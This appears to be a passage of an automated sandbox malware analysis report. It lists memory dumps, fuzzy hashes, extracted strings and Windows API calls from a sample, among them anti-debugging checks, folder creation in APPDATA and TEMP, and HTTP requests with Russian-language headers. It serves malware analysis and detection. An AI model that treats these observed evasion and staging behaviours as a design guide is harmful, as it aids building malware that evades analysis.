                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04B6A7BD
                                                • IsDebuggerPresent.KERNEL32 ref: 04B6A889
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B6A8A9
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 04B6A8B3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0.@$P.@$p.@$p.@P.@0.@
                                                • API String ID: 0-3587633984
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: <Zu$gxy${yio
                                                • API String ID: 0-3485204274
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04B62A70), ref: 04B6D102
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04B62A70), ref: 04B6D10C
                                                • UnhandledExceptionFilter.KERNEL32(04B6274A,?,?,?,?,?,04B62A70), ref: 04B6D119
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &no^$E_9$Fnhh
                                                • API String ID: 0-1962810965
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                • ExitProcess.KERNEL32 ref: 10005F60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: KyzL$Uq
                                                • API String ID: 0-1985466972
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P|$P|
                                                • API String ID: 0-3799934927
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1518329722-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID:
                                                • API String ID: 4168288129-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0Z@$Z@
                                                • API String ID: 0-605451032
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$H@
                                                • API String ID: 0-2786613154
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B75950,?,?,00000008,?,?,04B7C8B1,00000000), ref: 04B75B82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction ID: 65f3f24c76de2cb4eee7da6f8960c561aa8ffef6e1f1bc5b49752115257ec335
                                                • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction Fuzzy Hash: 35B1B070B0060A9BDB289FA8C994BBEBBA1FF45304F04CE1ED59297AD0D631F501CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction ID: f37925cc593c316ae9881622d4452ff5b0efd7030f5e24efaef72cde56ff4deb
                                                • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                • Instruction Fuzzy Hash: B0B1D478A0460A8BEB24CF68D954ABEB7B1EF04304F140A9EE557D7690D73DFA01CB51
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                                • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04B6A2CB), ref: 04B6A94C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                                • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ~
                                                • API String ID: 0-1707062198
                                                • Opcode ID: 8356a462a247f14bb6b47b2fd8a02a0373e8d17266fb41802ea114ca0818d2db
                                                • Instruction ID: 54323c23199c65c2a8247955a2f172636534e417a95094ca6017b2ee9bacdfbe
                                                • Opcode Fuzzy Hash: 8356a462a247f14bb6b47b2fd8a02a0373e8d17266fb41802ea114ca0818d2db
                                                • Instruction Fuzzy Hash: E9319EB241C601DFD709AF64E8857BAB7F8EF14310F21481FD2CA86212EA315881EB87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: V
                                                • API String ID: 0-1342839628
                                                • Opcode ID: 9f20ce63a5da2650b607b50d5ac113c2262577c70a29e0da87f8709e0cd60a88
                                                • Instruction ID: 631ce8d473864b4aa68d84ec4d94d324ef34c089ef7dcc638872351d1112534f
                                                • Opcode Fuzzy Hash: 9f20ce63a5da2650b607b50d5ac113c2262577c70a29e0da87f8709e0cd60a88
                                                • Instruction Fuzzy Hash: B41148B240C3956EEB024A349915AEA7FB8DB57310F0845ABE8C18B8E7C31A4D198777
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                                • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                                • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                                Strings
                                                • WakeAllConditionVariable, xrefs: 00409BDD
                                                • SleepConditionVariableCS, xrefs: 00409BD1
                                                • kernel32.dll, xrefs: 00409BC0
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 2565136772-3242537097
                                                • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                                • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                  • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                • _free.LIBCMT ref: 1000A03A
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 1000A05C
                                                • _free.LIBCMT ref: 1000A071
                                                • _free.LIBCMT ref: 1000A07C
                                                • _free.LIBCMT ref: 1000A09E
                                                • _free.LIBCMT ref: 1000A0B1
                                                • _free.LIBCMT ref: 1000A0BF
                                                • _free.LIBCMT ref: 1000A0CA
                                                • _free.LIBCMT ref: 1000A102
                                                • _free.LIBCMT ref: 1000A109
                                                • _free.LIBCMT ref: 1000A126
                                                • _free.LIBCMT ref: 1000A13E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                • String ID: APPDATA$TMPDIR
                                                • API String ID: 1838500112-4048745339
                                                • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                Strings
                                                • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: HeadersHttpRequest$H_prolog3_
                                                • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                • API String ID: 1254599795-787135837
                                                • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                                • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                                • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                                • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                                • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                                • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                                • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
